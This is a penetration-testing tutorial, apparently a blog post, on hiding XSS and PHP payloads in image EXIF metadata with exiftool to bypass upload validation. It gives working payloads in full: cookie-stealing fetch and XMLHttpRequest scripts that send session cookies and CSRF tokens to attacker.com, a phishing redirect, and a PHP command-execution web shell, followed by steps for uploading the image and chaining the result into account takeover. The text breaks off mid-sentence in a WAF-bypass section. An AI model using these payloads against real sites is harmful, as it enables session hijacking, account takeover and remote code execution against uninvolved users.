Listen to this Post

Introduction:
In the world of web application security, file upload functions are notoriously deceptive. While developers often implement strict filters to allow only image files (PNG/JPEG), they frequently overlook a critical attack surface: image metadata. Automated scanners, bound by their logic, see a valid image header and mark the file as safe. However, a manual penetration tester knows that the true vulnerability lies not in the pixels, but in the invisible data attached to them—EXIF data. By weaponizing this metadata, attackers can bypass Content Security Policies (CSP) and Web Application Firewalls (WAF) to achieve Remote Code Execution (RCE) or Cross-Site Scripting (XSS), transforming a “safe” upload form into a critical breach point.
Learning Objectives:
- Understand how to manipulate image metadata using `exiftool` for offensive security testing.
- Learn to craft polyglot files that bypass client-side and server-side image validation.
- Identify and exploit reflected metadata vulnerabilities to achieve XSS and potential session hijacking.
You Should Know:
1. Weaponizing Metadata: The Steganography of Code
The core of this attack relies on the disconnect between file validation and data handling. A server may validate that a file is a genuine image by checking its magic bytes (e.g., `‰PNG` or ÿØÿÙ). However, after accepting the file, the application might read and display its metadata (like author names, comments, or descriptions) without sanitization.
Step‑by‑Step Guide: Creating a Malicious Image Payload
We will use exiftool, a powerful command-line utility for reading, writing, and editing metadata in files. It is available natively on Linux/macOS and can be installed on Windows via WSL or standalone executables.
First, create a base image. You can use any PNG or JPEG. For this example, we create a simple PNG using ImageMagick or just use an existing image named base.png.
Now, we inject various JavaScript payloads into different metadata fields. The goal is to see which field, if any, is reflected back unsanitized by the web application.
Install exiftool if not present (Debian/Ubuntu)
sudo apt update && sudo apt install exiftool -y
Create a copy to work on
cp base.png malicious.png
Inject payloads into various metadata fields
exiftool -Artist="<script>alert('XSS-Artist')</script>" malicious.png
exiftool -Comment="<script>document.body.style.backgroundColor='red'</script>" malicious.png
exiftool -Copyright="<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>" malicious.png
exiftool -XMP:Description="<script>window.location='https://phishing.site'</script>" malicious.png
exiftool -EXIF:UserComment="<?php system($_GET['cmd']); ?>" malicious.png
Note: The last payload tests for potential PHP execution if the server misinterprets the file or includes it in a PHP context.
Verification:
To see the injected data, run:
exiftool malicious.png
You will see the fields populated with your JavaScript or PHP code. The file remains a valid image and will open in any viewer, but the malicious strings are now embedded.
2. The Upload and Reflection Test
Once the malicious image is crafted, the next step is to upload it to the target application and observe how the server handles the file. The vulnerability manifests when the server displays the image details back to the user—for example, in a profile page, a gallery, or an admin panel.
Methodology:
- Upload the File: Navigate to the file upload feature and submit
malicious.png. - Locate the Reflection: Find where the uploaded file’s details are displayed. Look for image names, “Uploaded by” fields, or image descriptions.
- Inspect the Response: Use your browser’s Developer Tools (F12) to view the source of the page where the image appears. Search for your payload strings (e.g.,
<script). If you see your unescaped HTML/JavaScript, you have found a vulnerability.
4. Test Different Contexts:
- HTML Context: If the payload renders as raw HTML, XSS is immediate.
- Attribute Context: If the payload is injected into an `src` or `alt` tag, you may need to break out of the attribute first (e.g.,
" onload="alert(1)). - Server-Side Parsing: If the server uses a library to read the Comment field and processes it (e.g., generating a thumbnail with a vulnerable library), it could lead to RCE.
- From XSS to Account Takeover: Chaining the Exploit
Discovering a reflected XSS via metadata is just the beginning. The impact escalates rapidly from a “proof of concept” alert box to a critical security breach.
Step‑by‑Step Guide: Session Hijacking Payload
Modify the `Copyright` payload to exfiltrate sensitive tokens.
exiftool -Copyright="
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://attacker.com/collect?cookie=' + encodeURIComponent(document.cookie) + '&xsrf=' + encodeURIComponent(document.querySelector('meta[name=\"csrf-token\"]')?.getAttribute('content')), true);
xhr.send();
</script>
" malicious.png
When a victim views the page containing this image, their browser executes the script, sending their session cookies and CSRF tokens to your controlled server. With these tokens, you can perform a session hijack or Cross-Site Request Forgery (CSRF) to change passwords or perform actions on behalf of the user.
4. Bypassing WAF and Content Filters
Modern WAFs are adept at detecting obvious `